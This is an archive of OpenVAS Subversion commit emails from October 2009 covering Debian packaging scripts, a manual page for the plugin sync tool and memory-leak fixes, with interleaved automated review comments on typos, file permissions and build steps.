@@ -1,48 +0,0 @@ -#!/bin/sh -e -# Postinst script for openvas-plugins -# (c) 2003-2007 Javier Fernández-Sanguino - -. /usr/share/debconf/confmodule -db_version 2.0 -test $DEBIAN_SCRIPT_DEBUG && set -v -x - - -# Note, This is far from optimal and might take some time to run. -# (and we have to do it again since we cannot preserve it through -# configure/postinst calls) -find_updated_plugs () { - DIST_PLIST=`mktemp` - ORIG_PLIST=`mktemp` - cat $OPENVASPLIST | sort > $DIST_PLIST - find $PLUGINDIR -maxdepth 1 -type f | sort > $ORIG_PLIST - comm -13 $DIST_PLIST $ORIG_PLIST - rm -f $ORIG_PLIST $DIST_PLIST - return 0 -} - -PLUGINDIR=/var/lib/openvas/plugins/ -OPENVASPLIST=/var/lib/dpkg/info/openvas-plugins.list -if [ "$1" = "configure" ] && [ -d $PLUGINDIR ]; then - db_get openvas-plugins/remove_unknown || true - REMOVE="$RET" - if [ "$REMOVE" = "true" ] ; then - newplugs="`find_updated_plugs`" - if [ -n "$newplugs" ] ; then - echo $newplugs | xargs -r rm -f - fi - fi -fi - -# Revert the change introduced in 2.0.10a-4, since -# now all plugins are in /var/ -if [ -d /var/lib/openvas/.desc-plugins ] && \ - [ -d /var/lib/openvas/plugins ] ; then - [ -L /var/lib/openvas/plugins/.desc ] && rm -f /var/lib/openvas/plugins/.desc - if [ ! -e /var/lib/openvas/plugins/.desc ]; then - mv /var/lib/openvas/.desc-plugins /var/lib/openvas/plugins/.desc - fi -fi - -#DEBHELPER# - -exit 0 Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates 2009-10-06 22:56:33 UTC (rev 5414) 
@@ -1,12 +0,0 @@ -Template: openvas-plugins/remove_unknown -Type: boolean -Default: false -_Description: Remove unknown OpenVAS plugins? - The /var/lib/openvas/plugins directory includes some unknown plugins. This - is probably because you downloaded additional plugins into it (e.g. by - running openvas-update-plugins). You currently have ${countnewplugs} - plugin(s) which are not provided by this package. - . - Note: This will apply to all your new installations/upgrades of this package - until you reconfigure it. You should say 'No' if you plan to - use openvas-update-plugins in the future. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list 2009-10-06 22:56:33 UTC (rev 5414) @@ -1,4 +1 @@ -01_makefile_fix_distclean.dpatch -02_adjust_examples.dpatch -03_makefile_clean_space.dpatch - +10_fix_install_permissions.dpatch Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 22:54:16 UTC (rev 5413) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 22:56:33 UTC (rev 5414) @@ -2,7 +2,7 @@ # Derived from dh_make example. #export DH_VERBOSE=1 -#export DH_COMPAT=4 +#export DH_COMPAT=5 include /usr/share/dpatch/dpatch.make @@ -18,7 +18,8 @@ build: build-stamp build-stamp: config.status dh_testdir - $(MAKE) + $(MAKE) + ( cd audit && sh exclude-plugins >exclude-list ) touch $@ config.status: configure patch 
@@ -32,15 +33,23 @@ dh_testroot touch openvas.tmpl [ ! -f Makefile ] || $(MAKE) distclean + -rm -rf audit/exclude-list dh_clean build-stamp + [ ! -f libtool ] || rm -f libtool + [ ! -d bin/ ] || rm -rf bin/ install: build-stamp dh_testdir dh_testroot dh_clean -k $(MAKE) install prefix=$(tmp)/usr sysconfdir=$(tmp)/etc localstatedir=$(tmp)/var/run libdir=$(tmp)/var/lib - rm -rf $(tmp)/var/run +# After we install we remove the plugins we want to exclude and +# audit the remaining plugins + ( cd $(tmp)/var/lib/openvas/plugins ; cat $(CURDIR)/audit/exclude-list $(CURDIR)/audit/remove-list | xargs rm -f ) + ( cd audit && sh audit-plugins $(tmp)/var/lib/openvas/plugins ) +# If the audit passes we continue + binary-indep: # Nothing to do, no arch-indep packages here. @@ -49,9 +58,9 @@ dh_testroot dh_installdebconf dh_installdocs docs/plugins_api.txt - dh_installexamples extra/update-openvas-plugins \ - extra/describe-openvas-plugin - dh_installchangelogs + dh_installexamples extra/describe-openvas-plugin + dh_installchangelogs + dh_link ifeq "$(findstring nostrip,$(DEB_BUILD_OPTIONS))" "" dh_strip strip --strip-unneeded --remove-section=.comment --remove-section=.note \ @@ -59,7 +68,6 @@ endif dh_compress dh_fixperms - chmod -x $(tmp)/var/lib/openvas/plugins/*.nes dh_installdeb dpkg-shlibdeps -Tdebian/openvas-plugins.substvars \ $(tmp)/var/lib/openvas/plugins/*.nes From scm-commit at wald.intevation.org Wed Oct 7 00:57:41 2009 
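Review bot: In debian/copyright (r5414), the "Debian advisories" paragraph changes the URL from http://www.debian.org/license to http://www.debian.org/licens and the copyright range from 1997-2006 to 1997-2005. Both look like an accidental revert to an older copy of the text rather than an intended change; restore the full URL and the later year unless the older range is deliberate. The same file refers to the script as both describe-openvas-plugin and describe-nessus-plugin, and debian/rules installs extra/describe-openvas-plugin, so one name should be used throughout.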
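Review bot: debian/patches/00list (r5414) now lists only 10_fix_install_permissions.dpatch, but that file appears in neither the Added nor the Modified list of this revision. Unless it was committed earlier, the dpatch step will stop on the missing patch at build time, so add the file in the same commit. The last debian/rules hunk also drops `chmod -x $(tmp)/var/lib/openvas/plugins/*.nes`, which leaves the permissions of the installed plugins dependent on that patch being present.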
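Review bot: In the install target of debian/rules (r5414, hunk @@ -32,15 +33,23 @@), the new cleanup line joins `cd $(tmp)/var/lib/openvas/plugins` and the `xargs rm -f` pipeline with `;`, so if the cd fails, rm -f runs on the listed names in whatever directory make is in. Use `&&`, as the neighbouring `( cd audit && sh audit-plugins ... )` line does. The pipeline also reads audit/remove-list, while only audit/exclude-list is generated in build-stamp; if remove-list is a static file shipped in the source, a comment saying so would help, because a missing file there does not stop xargs from acting on the other list.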
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:57:41 +0200 (CEST) Subject: [Openvas-commits] r5415 - in trunk/openvas-libraries: . base misc nasl Message-ID: <20091006225741.5F31F861EAAA@pyrosoma.intevation.org> Author: timb Date: 2009-10-07 00:57:40 +0200 (Wed, 07 Oct 2009) New Revision: 5415 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/base/openvas_certificate_file.c trunk/openvas-libraries/misc/network.c trunk/openvas-libraries/misc/openvas_auth.c trunk/openvas-libraries/nasl/nasl_scanner_glue.c Log: Fixed a bunch of memory and resource leaks Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-06 22:56:33 UTC (rev 5414) +++ trunk/openvas-libraries/ChangeLog 2009-10-06 22:57:40 UTC (rev 5415) @@ -1,3 +1,9 @@ +2009-10-06 Tim Brown + + * misc/network.c, misc/openvas_auth.c, nasl/nasl_scanner_glue.c + base/openvas_certificate_file.c: Fixed a bunch of resource and memory + leaks. + 2009-10-06 Michael Wiegand Post-release version bump. Modified: trunk/openvas-libraries/base/openvas_certificate_file.c =================================================================== --- trunk/openvas-libraries/base/openvas_certificate_file.c 2009-10-06 22:56:33 UTC (rev 5414) +++ trunk/openvas-libraries/base/openvas_certificate_file.c 2009-10-06 22:57:40 UTC (rev 5415) @@ -130,6 +130,7 @@ //show_error(_("Error exporting key file: %s"), err->message); g_error_free(err); g_key_file_free(key_file); + close(fd); return FALSE; } Modified: trunk/openvas-libraries/misc/network.c =================================================================== --- trunk/openvas-libraries/misc/network.c 2009-10-06 22:56:33 UTC (rev 5414) +++ trunk/openvas-libraries/misc/network.c 2009-10-06 22:57:40 UTC (rev 5415) 
@@ -572,9 +572,10 @@ } -/* helper function copied from cli.c from GnuTLS - * Reads a file into a gnutls_datum - */ +/** helper function copied from cli.c from GnuTLS + Reads a file into a gnutls_datum + @todo Fix the resource leak of FILE *f + **/ static gnutls_datum load_file (const char *file) { Modified: trunk/openvas-libraries/misc/openvas_auth.c =================================================================== --- trunk/openvas-libraries/misc/openvas_auth.c 2009-10-06 22:56:33 UTC (rev 5414) +++ trunk/openvas-libraries/misc/openvas_auth.c 2009-10-06 22:57:40 UTC (rev 5415) @@ -153,6 +153,7 @@ g_free (file_name); if (error) { + g_free (hash); g_error_free (error); return 1; } @@ -162,6 +163,7 @@ if (*split == NULL || *seed_hex == NULL) { g_warning ("Failed to split auth contents."); + g_free (hash); g_strfreev (split); return -1; } Modified: trunk/openvas-libraries/nasl/nasl_scanner_glue.c =================================================================== --- trunk/openvas-libraries/nasl/nasl_scanner_glue.c 2009-10-06 22:56:33 UTC (rev 5414) +++ trunk/openvas-libraries/nasl/nasl_scanner_glue.c 2009-10-06 22:57:40 UTC (rev 5415) @@ -506,6 +506,7 @@ { nasl_perror(lexic, "script_get_preference_file_content: fstat(%s): %s\n", value, strerror(errno)); + close(fd); return NULL; } From scm-commit at wald.intevation.org Wed Oct 7 00:57:45 2009 
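Review bot: The misc/network.c hunk (r5415) changes only the comment above load_file and records the FILE *f leak as a @todo, while the log message and ChangeLog entry list misc/network.c among the files where leaks were fixed. Either close f on every exit path of load_file in this commit, or word the ChangeLog entry so it says the leak in network.c is documented, not fixed. The rewritten comment also drops the leading asterisks the original used on its continuation lines; keep the file's comment style.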
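Review bot: In misc/openvas_auth.c (r5415), g_free (hash) is now repeated by hand in both error branches, at @@ -153,6 +153,7 @@ and @@ -162,6 +163,7 @@. Any further early return added to this function needs the same line, which is how the leak arose in the first place. A single cleanup label that releases hash, split and error before returning would keep every exit of this authentication routine consistent.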
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:57:45 +0200 (CEST) Subject: [Openvas-commits] r5416 - trunk/openvas-packaging/openvas-plugins/debian/trunk/debian Message-ID: <20091006225745.DAB1E861EAAC@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 00:57:45 +0200 (Wed, 07 Oct 2009) New Revision: 5416 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/docs trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars Log: Added missing files for this release Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README 2009-10-06 22:57:40 UTC (rev 5415) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README 2009-10-06 22:57:45 UTC (rev 5416) 
@@ -0,0 +1,22 @@ + +Please note that the upstream maintainers no longer maintain this +package and request users to upgrade the plugins using the +'openvas-nvt-sync' program. + +This package provides a set of basic plugins as well as the 'openvas-nvt-sync' +program. Administrators should update their plugins right after installing this +package through the script. + +The set of plugins provided by this package might be useful for users +that are running OpenVAS in closed environments and without an Internet +connection (or in a network which has limited access to the Internet). However, +users are encouraged to download and install the full set since this package +might not be updated frequently enough. + +An out-of-date set of plugins (i.e. security checks) might lead to a "false +sense of security". There might be open security holes in your network or +systems which openvas-server might not detect if using outdated plugins. + + +-- Sun Sep 20 04:42:18 CEST 2009 +Javier Fernandez-Sanguino Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source 2009-10-06 22:57:40 UTC (rev 5415) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source 2009-10-06 22:57:45 UTC (rev 5416) 
@@ -0,0 +1,6 @@ +The new original tarball can be created by removing the non-free plugins +listed in audit/REMOVED-PLUGINS file and removing the packaging/subdirectory + +For the rest we use dpatch for patch handling inside our package(s). Please +see /usr/share/doc/dpatch/README.source.gz (if you have dpatch installed) for +documentation on how to use dpatch. Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/docs =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/docs 2009-10-06 22:57:40 UTC (rev 5415) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/docs 2009-10-06 22:57:45 UTC (rev 5416) @@ -0,0 +1,2 @@ +debian/README +debian/README.source Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages 2009-10-06 22:57:40 UTC (rev 5415) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages 2009-10-06 22:57:45 UTC (rev 5416) @@ -0,0 +1 @@ +debian/openvas-nvt-sync.8 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 2009-10-06 22:57:40 UTC (rev 5415) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 2009-10-06 22:57:45 UTC (rev 5416) 
@@ -0,0 +1,58 @@ +.\" Hey, EMACS: -*- nroff -*- +.TH OPENVAS-NVT-SYNC 8 "Septmeber 2008" "The OpenVAS Project" "User Manuals" +.SH NAME +openvas-nvt-sync \- updates the OpenVAS security checks +.SH SYNOPSIS +.B openvas-nvt-sync +.SH DESCRIPTION +The +.B OpenVAS Security Scanner +performs several security checks, each of them being coded as an external +plugin coded in NASL. As new security holes are published every day, new +plugins appear on the OpenVAS site (www.openvas.org) +.br +The script +.B openvas-nvt-sync +will fetch all the newest security checks for you and install them at the proper +location. Once this is done you will need to restart openvas-server(8) s +so that it loads them and uses them for new security scans. + +.br +.B openvas-nvt-sync +uses rsync(1) and md5sum(1) to do its job. In order to download the +new plugins the machine where the script runs needs to have +access to rsync.openvas.org using the rsync protocol (TCP/UDP port 873). + +.SH SECURITY NOTES +.B openvas-nvt-sync +uses rsync(1) to retrieve the archive of the new plugins. The scripts +provided by the OpenVAS project might +.B not be signed +\. Consequently, if somewhere where to poison your DNS server and force this +script to retrieve NASL plugins on another site he would force +your OpenVAS server to execute NASL scripts when running security tests. +Even if this might not do much harm (see the NASL reference guide +for more information on that subject) you should be very careful +when doing this. + +.SH SEE ALSO +For more information see: +.BR rsync(1), +.BR openvasd(8) +.BR openvas-client(1). +.br +There is more information available at +.B /usr/share/doc/openvas-plugins +on Debian systems. +.PP +You can find additional information about the OpenVAS project in +http://www.openvas.org + +.SH AUTHOR +This manual page was written by +Javier Fern\['a]ndez-Sanguino Pe\[~n]a +for the Debian GNU/Linux system (but may be used on other systems). 
+.PP +The +.B openvas-nvt-sync +script was written by DN-Systems Enterprise Internet Solutions GmbH. Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links 2009-10-06 22:57:40 UTC (rev 5415) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links 2009-10-06 22:57:45 UTC (rev 5416) @@ -0,0 +1,4 @@ +usr/lib/openvas/plugins/find_service.nes var/lib/openvas/plugins/find_service.nes +usr/lib/openvas/plugins/openvas_tcp_scanner.nes var/lib/openvas/plugins/openvas_tcp_scanner.nes +usr/lib/openvas/plugins/ssl_ciphers.nes var/lib/openvas/plugins/ssl_ciphers.nes +usr/lib/openvas/plugins/synscan.nes var/lib/openvas/plugins/synscan.nes Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars 2009-10-06 22:57:40 UTC (rev 5415) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars 2009-10-06 22:57:45 UTC (rev 5416) @@ -0,0 +1 @@ +shlibs:Depends=libc6 (>= 2.3), libgcrypt11 (>= 1.4.2), libglib2.0-0 (>= 2.12.0), libgnutls26 (>= 2.7.14-0), libopenvas2 (>= 2.0.4), libpcap0.8 (>= 1.0.0-1) From scm-commit at wald.intevation.org Wed Oct 7 01:00:35 2009 
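Review bot: in the new openvas-nvt-sync.8 (r5416) the SECURITY NOTES sentence "if somewhere where to poison your DNS server" should read "if someone were to poison your DNS server". The same file has "Septmeber 2008" in the .TH line and a stray "s" after openvas-server(8) in DESCRIPTION. SEE ALSO lists openvasd(8) without a trailing comma while DESCRIPTION calls the daemon openvas-server(8); use one name throughout. The SECURITY NOTES should also say whether the md5sum(1) step mentioned in DESCRIPTION gives any protection in the DNS-poisoning case, because the text only states that the scripts might not be signed and leaves the reader to guess what the checksum is compared against.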
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 01:00:35 +0200 (CEST) Subject: [Openvas-commits] r5417 - trunk/openvas-packaging/openvas-plugins/debian/trunk/debian Message-ID: <20091006230035.2DFD5861EAAC@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 01:00:34 +0200 (Wed, 07 Oct 2009) New Revision: 5417 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.dirs trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.links trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.postrm trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.preinst Removed: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 Log: New package version (1.0.7-3) fixing minor bugs. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:57:45 UTC (rev 5416) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 23:00:34 UTC (rev 5417) 
@@ -1,3 +1,15 @@ +openvas-plugins-dfsg (1.0.7-3) unstable; urgency=low + + * Add slad_run.nasl to audit/remove-list since it ellicits an error + when starting openvasd + * Update the manual page to include a reference to RSYNC_PROXY, useful + for users behind a proxy + * Fix bug in grep call of audit/generate-license-list + * Rename openvas-plugins.* files to openvas-plugins-dfsg.* under debian/ so + that they are shipped as part of the package. + + -- Javier Fernandez-Sanguino Pen~a Sun, 20 Sep 2009 10:44:53 +0200 + openvas-plugins-dfsg (1.0.7-2) unstable; urgency=low * Provide this package in Debian which includes the openvas-nvt-sync required Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 2009-10-06 22:57:45 UTC (rev 5416) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 2009-10-06 23:00:34 UTC (rev 5417) 
@@ -23,6 +23,10 @@ new plugins the machine where the script runs needs to have access to rsync.openvas.org using the rsync protocol (TCP/UDP port 873). +If you are behind a web proxy you can configure rsync to use it through the +use of the RSYNC_PROXY environment variable. For more information see +rsync(1). + .SH SECURITY NOTES .B openvas-nvt-sync uses rsync(1) to retrieve the archive of the new plugins. The scripts Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.dirs (from rev 5414, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs) Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.links (from rev 5416, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links) Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.postrm (from rev 5408, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm) Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.preinst (from rev 5408, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst) Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs 2009-10-06 22:57:45 UTC (rev 5416) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs 2009-10-06 23:00:34 UTC (rev 5417) 
@@ -1,2 +0,0 @@ -var/lib/openvas/plugins -var/lib/openvas/plugins-factory Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links 2009-10-06 22:57:45 UTC (rev 5416) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links 2009-10-06 23:00:34 UTC (rev 5417) @@ -1,4 +0,0 @@ -usr/lib/openvas/plugins/find_service.nes var/lib/openvas/plugins/find_service.nes -usr/lib/openvas/plugins/openvas_tcp_scanner.nes var/lib/openvas/plugins/openvas_tcp_scanner.nes -usr/lib/openvas/plugins/ssl_ciphers.nes var/lib/openvas/plugins/ssl_ciphers.nes -usr/lib/openvas/plugins/synscan.nes var/lib/openvas/plugins/synscan.nes Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm 2009-10-06 22:57:45 UTC (rev 5416) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm 2009-10-06 23:00:34 UTC (rev 5417) 
@@ -1,32 +0,0 @@ -#!/bin/sh -e - -if [ "$1" = "purge" ] && [ -d /usr/lib/openvas/plugins ]; then - echo "" - echo "The /usr/lib/openvas/plugins directory still exists." - echo "This might be because you downloaded additional plugins into it" - echo "when using a previous Nessus version." - echo -n "Do you want to remove the full directory now? " - read ANSWER - case $ANSWER in - [yY]*) rm -rf /usr/lib/openvas/plugins ;; - esac -fi - -if [ "$1" = "purge" ] && [ -d /var/lib/openvas/plugins ]; then - echo "" - echo "The /var/lib/openvas/plugins directory still exists." - echo "This might be because you downloaded additional plugins into it." - if [ -d /var/lib/openvas/plugins/.desc ]; then - echo "Or because the openvasd package was not fully purged." - fi - echo "" - echo -n "Do you want to remove the full directory now? " - read ANSWER - case $ANSWER in - [yY]*) rm -rf /var/lib/openvas/plugins ;; - esac -fi - -#DEBHELPER# - -exit 0 Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst 2009-10-06 22:57:45 UTC (rev 5416) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst 2009-10-06 23:00:34 UTC (rev 5417) 
@@ -1,39 +0,0 @@ -#!/bin/sh -e -# Preinst script for openvas-plugins -# (c) 2004-2007 Javier Fernández-Sanguino - -PLUGINDIR=/var/lib/openvas/ -OPLUGINDIR=/usr/lib/openvas/ - -# Basicly, check if there is anything - -[ ! -d $OPLUGINDIR ] && exit 0 - -echo -n "Moving plugins from $OPLUGINDIR to $PLUGINDIR..." -if [ ! -d $PLUGINDIR ] ; then - mkdir -p $PLUGINDIR - chown root:root $PLUGINDIR - chmod 0766 $PLUGINDIR -fi - -# Now, we don't care about descriptions, they will be regenerated -[ -d "$OPLUGINDIR/.desc" ] && rm -rf $OPLUGINDIR/.desc -[ ! -d "$PLUGINDIR/.desc" ] && mkdir $PLUGINDIR/.desc - -find $OPLUGINDIR -maxdepth 1 -mindepth 1 | -while read content; do - base=`basename $content` - if [ -e "$PLUGINDIR/$base" ]; then - cp -a "$OPLUGINDIR/$base" $PLUGINDIR - rm -rf "$OPLUGINDIR/$base" - else - mv "$OPLUGINDIR/$base" $PLUGINDIR - fi -done - - -echo ".done" - -#DEBHELPER# - -exit 0 Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars 2009-10-06 22:57:45 UTC (rev 5416) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars 2009-10-06 23:00:34 UTC (rev 5417) @@ -1 +0,0 @@ -shlibs:Depends=libc6 (>= 2.3), libgcrypt11 (>= 1.4.2), libglib2.0-0 (>= 2.12.0), libgnutls26 (>= 2.7.14-0), libopenvas2 (>= 2.0.4), libpcap0.8 (>= 1.0.0-1) From scm-commit at wald.intevation.org Wed Oct 7 01:04:01 2009 
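Review bot: the preinst being renamed in r5417 runs `chmod 0766 $PLUGINDIR` on /var/lib/openvas/, which makes a root-owned directory writable by group and others while giving them no search bit; if the copy taken from rev 5408 still has that line, 0755 looks like the intended mode for a directory that holds scanner plugins. The rename is also a good moment to quote $content, $OPLUGINDIR and $PLUGINDIR everywhere (`basename $content` and the `rm -rf $OPLUGINDIR/.desc` line are unquoted) and to use `read -r` in the loop. In the changelog hunk, "ellicits" should be "elicits".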
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 01:04:01 +0200 (CEST) Subject: [Openvas-commits] r5418 - trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches Message-ID: <20091006230401.19D8E861EAAC@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 01:04:00 +0200 (Wed, 07 Oct 2009) New Revision: 5418 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch Log: Add patch file for 1.0.7 package version Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch 2009-10-06 23:00:34 UTC (rev 5417) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch 2009-10-06 23:04:00 UTC (rev 5418) @@ -0,0 +1,18 @@ +#! /bin/sh /usr/share/dpatch/dpatch-run +## 10_fix_install_permissions.dpatch by Jan Wagner +## +## DP: fix permissions for shared libraries + + at DPATCH@ +diff -urNad openvas-plugins-1.0.7~/Makefile openvas-plugins-1.0.7/Makefile +--- openvas-plugins-1.0.7~/Makefile 2009-04-17 11:56:08.000000000 +0200 ++++ openvas-plugins-1.0.7/Makefile 2009-09-18 12:41:31.000000000 +0200 +@@ -33,7 +33,7 @@ + + install-nes: install-dirs + for plugins in bin/*.nes; do \ +- $(INSTALL) -m 555 $$plugins \ ++ $(INSTALL) -m 444 $$plugins \ + $(DESTDIR)${libdir}/openvas/plugins; \ + done + From scm-commit at wald.intevation.org Wed Oct 7 01:16:32 2009 
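Review bot: the dpatch header in r5418 says only "fix permissions for shared libraries", but the change in install-nes from `-m 555` to `-m 444` removes the execute bit from the .nes plugins without giving the reason. Add a sentence to the DP: description saying why the plugins do not need to be executable, so the patch can be kept or dropped knowingly at the next upstream release. The commit log says "1.0.7 package version" while the changelog entries in this series are 1.0.7-3 and 1.0.7-4+svn20090920; name the Debian revision the patch belongs to.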
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 01:16:32 +0200 (CEST) Subject: [Openvas-commits] r5419 - in trunk/openvas-packaging/openvas-plugins/debian/trunk/debian: . configuration Message-ID: <20091006231632.B97E1861EAAC@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 01:16:31 +0200 (Wed, 07 Oct 2009) New Revision: 5419 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/configuration/ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/configuration/openvas-plugins-dfsg.templates.NEW trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-base.install trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-base.manpages trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.install trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.lintian-overrides Removed: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/ Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.dirs trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.postrm trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules Log: New debian package (1.0.7-4+svn20090920) dividing the sync script and the DFSG plugins into different packages (-base and -dfsg) Modified: 